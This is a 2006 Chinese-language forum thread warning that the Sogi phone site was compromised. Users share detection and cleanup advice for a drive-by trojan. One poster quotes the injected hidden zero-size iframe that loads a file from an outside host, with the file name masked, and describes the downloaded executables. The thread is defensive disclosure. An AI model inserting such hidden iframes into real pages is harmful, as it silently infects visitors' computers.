常到Sogi! 手機王的網友請注意。
該網站已經被植入木馬,一進入網站將會被暗中下載及執行木馬程式。
常到Sogi! 手機王的網友請注意。
該網站已經被植入木馬,一進入網站將會被暗中下載及執行木馬程式。
何時發現的??
完了,我10月中旬有上去查資料耶!可是SCS3.1軟體沒有警告一一"
這下怎麼找到知道有無中標和去解這木馬??
這消息哪裡來的?
我這陣子都有上手機王,不過卡巴也沒偵測到,全機掃描的時候也沒發現?
所以是真的還是誤傳?
前幾天有不正常反應,今天開著FlashGet去試就攔截到了.......作者:EVO
開起手機王的網站後觀看原始碼,將原始碼拉到最下方:
找到以下的原始碼,就是連到木馬網站
[PHP]
<iframe src=http://www.lifeline.org.tw/image/***.***(消音) width=0 height=0></iframe>
[/PHP]
不過剛剛再去測試,上述網址已經沒有反應了.......
忘記說.......^^"
開FlashGet是利用FlashGet會接手IE下載檔案的特性來捕捉那些隱藏的下載。
所以不是防毒程式攔截到的。
另外也已經通知手機王了。
木馬名稱??
該木馬的目的??
那怎麼知道自己中標了??
如何解決??
謝謝QQ
大概分析了一下:
[PHP]
<iframe src=http://www.lifeline.org.tw/image/***.***(消音) width=0 height=0></iframe>
[/PHP]
會經由該網頁下載檔案svchost.exe並執行。
但是會出現svchost.exe並不是標準的應用程式,然後跟著下載1.exe
svchost.exe內容:見附加檔案Sogi.jpg
檔案大小:174 位元組
該木馬的目的:未知
那怎麼知道自己中標了:
檢查C:\Documents and Settings\使用者名稱\Local Settings\Temp下是否有
svchost.exe
如何解決:
將C:\Documents and Settings\使用者名稱\Local Settings\Temp
底下的svchost.exe直接刪除
至於1.exe恕在下無膽......~"~
早早就在FlashGet裡面刪除了.......^^"
PS.偵測至目前時間還是無法ping到該網站
此文章於 2006-10-29 01:01 AM 被 hcchen 編輯。
謝謝告知!
依照大大提供的方式看來我沒中標Orz
最討厭駭客搞這種釣魚方式=.=
以後有機會再去裝一個Norton Confidential來預防XD
作者:hcchen
意外的在C:\WINDOWS\system32下發現
msnfile.dll和msnfile.exe這2個檔案......
產生的時間剛好在偵測手機王木馬的這段時間
爬了一下還沒有仔細的相關資訊.......
另外,剛剛上了手機王看了一下.......
該框架語法已經移除了........
連到 www.sogi.com.tw 會自動下載 gfile.dll 到c:\windows\system32\資料夾底下, AntiVir PersonalEdition Premium找到"HEUR/Malware"病毒,請大家測試一下自己的防毒軟體....^_^
書籤